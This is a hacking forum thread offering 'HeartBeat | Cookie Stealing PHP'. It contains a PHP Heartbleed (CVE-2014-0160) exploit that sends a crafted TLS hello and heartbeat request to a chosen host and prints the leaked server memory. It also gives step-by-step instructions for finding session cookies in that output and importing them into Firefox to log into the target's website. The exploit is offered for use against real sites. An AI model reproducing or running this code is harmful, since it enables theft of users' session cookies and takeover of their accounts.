Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy

Locked HeartBeat | Cookie Stealing PHP


sQuo

Recommended Posts

How to run it quite easily, put the following code in webservernya.Then run via the browser, in fact more effectively using the cli tp gpp,Enter the host and port his stndart 443, then submit.To find the cookies in the browser is trying to press CTRL + F and then input text "Cookies:" without the quotes, if any means we can use the cookies to login to the target website.To move the cookies had a target to firefox can use Mozilla firefox add ons such as cookies manager, tamper data, liveheader.

This is the hidden content, please
[HIDE-THANKS]

This is the hidden content, please

[/HIDE-THANKS]

Link to comment
Share on other sites

Re: HeartBeat | Cookie Stealing PHP

 

Parse error: syntax error, unexpected '&', expecting ',' or ')' in .php on line 30

 

This is the hidden content, please

 

ya esta corregido, eso sale al poner la etiqueta php

Link to comment
Share on other sites

Heartbeat ~ CVE-2014-0160

by

This is the hidden content, please


<?phpif(isset($_POST['submit'])) {$hello = "16 03 02 00 dc 01 00 00 d8 03 02 5343 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cfbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 0000 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 8800 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1cc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0cc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 1100 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 0403 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 1900 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 0800 06 00 07 00 14 00 15 00 04 00 05 00 12 00 1300 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 0000 0f 00 01 01";$hb = "18 03 02 00 03 01 40 00";function hexbin($string) {$strz = explode(" ",str_replace(""," ",$string));$bin = '';foreach($strz as $str) {$bin .= chr(hexdec($str));}return $bin;}$fp = fsockopen($_POST['host'],$_POST['port'],$errno,$errstr,30);if(!$fp) {echo $errstr;} else {echo "Connecting...";echo "Hello SSL";fwrite($fp,hexbin($hello));$is_hello = true;$is_hb = false;while(!feof($fp)) {if($is_hello == true) {$buffer = fgets($fp,4096);$is_hello = false;} else {$buffer = fgets($fp,1024);if($is_hb == false) {echo "Sending heartbeat request...";fwrite($fp,hexbin($hb));$is_hb == true;}}echo $buffer;}fclose($fp);}}?>
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.